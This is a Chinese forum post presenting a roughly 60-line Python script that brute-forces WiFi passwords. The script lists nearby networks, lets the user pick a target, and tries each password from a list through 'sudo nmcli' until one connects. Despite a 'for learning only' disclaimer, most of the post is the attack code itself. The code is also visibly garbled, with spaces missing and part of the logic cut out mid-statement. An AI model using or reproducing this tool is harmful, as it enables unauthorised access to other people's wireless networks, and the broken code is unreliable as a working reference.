
标题: 解锁WiFi密码,我只用了60行代码 [打印本页]

作者: 吴旭华    时间: 2022-9-17 08:39
标题: 解锁WiFi密码,我只用了60行代码
 WiFi现在已经遍布我们生活方方面面,如今,如论到工作单位,还是租住的房子,或者一家餐厅,随处都可以连上WiFi。因此,我们对WiFi密码的需求也没有之前那么迫切了。如何破解WiFi密码?本文,将会通过Python教大家如何实现,这里纯粹是为了学习用途。​<ol  data-offset-key="7778p-0-0"><li  data-block="true" data-editor="7irfn" data-offset-key="7778p-0-0">选择WiFi 获取WiFi列表之后,下一步要做的就是选择我们想要连接的WiFi, def prompt_for_target_choice(max): whileTrue: try: selected = int(input("\nEnter number of target: ")) if(selected >= 1and selected = 8): time.sleep(3)​ creds = os.popen("sudo nmcli dev wifi connect " + selected_network+" password "+decoded_line).read() # print(creds)​ if ("Error:"in creds.strip()): if args.verbose isTrue: print(bcolors.FAIL+"** TESTING **: password '" + decoded_line+"' failed."+bcolors.ENDC) else: sys.exit(bcolors.OKGREEN+"** KEY FOUND! **: password '" + decoded_line+"' succeeded."+bcolors.ENDC) else: if args.verbose isTrue: print(bcolors.OKCYAN+"** TESTING **: password '" + decoded_line+"' too short, passing."+bcolors.ENDC)​ print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC)核心功能3个函数就完成了,只用了60行Python代码!下面就把它们串联在一起:def main(): require_root() args = argument_parser()​ # The user chose to supplied their own url if args.url isnotNone: passwords = fetch_password_from_url(args.url) # user elect to read passwords form a file elif args.file isnotNone: file = open(args.file, "r") passwords = file.readlines() ifnot passwords: print("Password file cannot be empty!") exit(0) file.close() else: # fallback to the default list as the user didnt supplied a password list default_url = "" passwords = fetch_password_from_url(default_url)​ # grabbing the list of the network ssids func_call = start(1) networks = func_call[0] security_type = func_call[1] ifnot networks: print("No networks found!") sys.exit(-1)​ display_targets(networks, security_type) max = len(networks) pick = prompt_for_target_choice(max) target = networks[pick] print("\nWifi-bf is running. If you would like to see passwords being tested in realtime, enable the [--verbose] flag at start.")​ brute_force(target, passwords, args)执行函数,就会在命令行下显示附近的WiFi列表,选择之后就开始逐个尝试密码。​不同的颜色代表不同不同的结果:

  • 红色:测试失败
  • 绿色:破解成功
  • 紫色:测试中

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